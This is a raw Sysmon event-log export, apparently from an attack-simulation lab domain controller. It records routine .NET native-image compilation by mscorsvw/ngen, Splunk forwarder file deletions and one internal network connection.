11241100x800000000000000022026Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:27.781{4DB9351A-A253-60D3-CD04-00000000CF01}3936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f60-0\System.Web.ApplicationServices.dll2021-06-23 21:06:27.781 10341000x800000000000000022025Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:27.718{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A253-60D3-CD04-00000000CF01}3936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022024Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.703{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A253-60D3-CD04-00000000CF01}3936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022023Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:27.703{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A253-60D3-CD04-00000000CF01}3936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022022Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:27.644{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A253-60D3-CC04-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022021Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.624{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A253-60D3-CC04-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022020Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:27.624{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A253-60D3-CC04-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022019Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:27.562{4DB9351A-A253-60D3-CB04-00000000CF01}7072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1ba0-0\System.Web.Abstractions.dll2021-06-23 21:06:27.562 10341000x800000000000000022018Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:27.531{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A253-60D3-CB04-00000000CF01}7072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022017Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.515{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A253-60D3-CB04-00000000CF01}7072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022016Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:27.515{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A253-60D3-CB04-00000000CF01}7072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022015Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:27.343{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A253-60D3-CA04-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022014Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.281{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A253-60D3-CA04-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022013Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:27.281{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A253-60D3-CA04-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000022012Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.221{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7806767FA8E034422970EA6C94FF11C9,SHA256=9C29E8082C59CD5D652BD9A7D3BFD545A2B2DB54750086FFEFB0FB5418543AEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022036Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:28.546{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=69EE1917052CC418564DCFBB3D4A4A01,SHA256=A97875EFC810A952A16D114DF4F4305FA5CCADAC52F6A8769BAC9BBDB16C6A87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022035Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:28.546{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3AC984FA5394644755F6BFD94719A55F,SHA256=DC8C9E81F5927EC61B2CDA5143D2CE5536F9EAA0D4F8723668B69E7C895B57BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000022034Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.245{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61451-false10.0.1.12-8000- 23542300x800000000000000022033Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:28.265{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAB1F5AF1C710AD40CA216517A9B9328,SHA256=89B93446B46DA4485720DB8499F4AD52CD71D5014CB68E20140C4794EBBE28D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022044Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:29.938{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A255-60D3-D104-00000000CF01}6628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022043Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:29.921{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A255-60D3-D104-00000000CF01}6628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022042Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:29.921{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A255-60D3-D104-00000000CF01}6628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022041Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:29.859{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A255-60D3-D004-00000000CF01}6804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022040Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:29.827{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A255-60D3-D004-00000000CF01}6804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022039Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:29.827{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A255-60D3-D004-00000000CF01}6804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022038Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:29.687{4DB9351A-A253-60D3-CF04-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\410-0\System.Web.DataVisualization.dll2021-06-23 21:06:29.687 23542300x800000000000000022037Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:29.281{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8FA55F40A1067BE0B6D759477919EBC,SHA256=F562505E5AFB8800C7496813FAA284A2B9D386F7F31F85FCF2E16E445FE8745B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022053Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:30.838{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=69EE1917052CC418564DCFBB3D4A4A01,SHA256=A97875EFC810A952A16D114DF4F4305FA5CCADAC52F6A8769BAC9BBDB16C6A87,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022052Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:30.557{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A256-60D3-D304-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022051Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
